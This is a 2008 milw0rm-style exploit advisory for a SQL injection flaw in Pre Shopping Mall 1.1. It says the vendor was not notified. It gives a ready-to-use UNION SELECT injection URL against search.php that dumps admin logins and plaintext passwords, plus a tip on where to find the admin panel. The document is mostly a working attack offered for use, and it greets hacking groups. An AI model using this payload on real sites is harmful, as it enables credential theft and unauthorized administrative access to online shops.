43 lines
No EOL
1.3 KiB
Text
43 lines
No EOL
1.3 KiB
Text
--==+================================================================================+==--
|
|
--==+ Pre Shopping Mall 1.1 SQL Injection Vulnerablity +==--
|
|
--==+================================================================================+==--
|
|
|
|
|
|
|
|
Discovered By: t0pP8uZz
|
|
Discovered On:
|
|
Script Download: http://preproject.com
|
|
DORK: N/A
|
|
|
|
|
|
|
|
Vendor Has Not Been Notified!
|
|
|
|
|
|
|
|
DESCRIPTION:
|
|
Pre Shopping Mall suffers from multiple remote sql injection bugs.
|
|
this allows the remote attacker to pull admin credentials from the database, since the admin details are in plaintext
|
|
this makes it easy for the attacker to gain access to the administarion panel.
|
|
|
|
|
|
|
|
SQL Injection:
|
|
ADMIN: http://site.com/emall/search.php?search='/**/and/**/1=2/**/UNION/**/ALL/**/SELECT/**/1,2,3,CONCAT(login,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16/**/FROM/**/admin/*
|
|
|
|
|
|
|
|
NOTE/TIP:
|
|
admin login is at /admin/
|
|
injection is multi-row, so it will pull all rows from a table.
|
|
|
|
|
|
GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew !
|
|
|
|
|
|
|
|
--==+================================================================================+==--
|
|
--==+ Pre Shopping Mall 1.1 SQL Injection Vulnerablity +==--
|
|
--==+================================================================================+==--
|
|
|
|
# milw0rm.com [2008-05-06] |